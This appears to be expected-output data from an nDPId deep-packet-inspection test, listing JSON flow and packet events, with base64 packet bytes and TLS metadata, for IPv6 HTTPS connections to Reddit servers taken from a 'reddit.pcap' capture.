-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2EAAAAAoAL9IFHtAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiEAAAAAoAL9IB7eAAACBAWgBAIICql05gQAAAAAAQMDBw=="} 
-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXsAAAAAoAL9ID\/VAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowUAAAAAoAL9IHbXAAACBAWgBAIICql05gQAAAAAAQMDBw=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JWtCtDxMC8voBJXgHBaAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686065,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+p6YTHT6uGMsoBJXgOg4AAACBAV4AQMDAwQCCArC1zipqXTl5w=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc+BQBJhBwR01MoBJXgDmIAAACBAV4AQMDAwQCCArC1zipqXTl5w=="} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686071,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9o6MJX7sl7kLoBJXgNeBAAACBAV4AQMDAwQCCArC1zioqXTl5w=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YyyemEx1gBAB+2wmAAABAQgKqXTmC8LXOKk="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUwUASYRgBAB+711AAABAQgKqXTmC8LXOKk="} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686071,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQuOjCV\/gBAB+1tvAAABAQgKqXTmC8LXOKg="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbEAAAAAoAL9ICltAAACBAWgBAIICql05hgAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJL0EwGjpsfoBJXgFyoAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdABmbR4V8rX10oBJXgNWtAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/oyw49PvcdTXoBJXgPwjAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
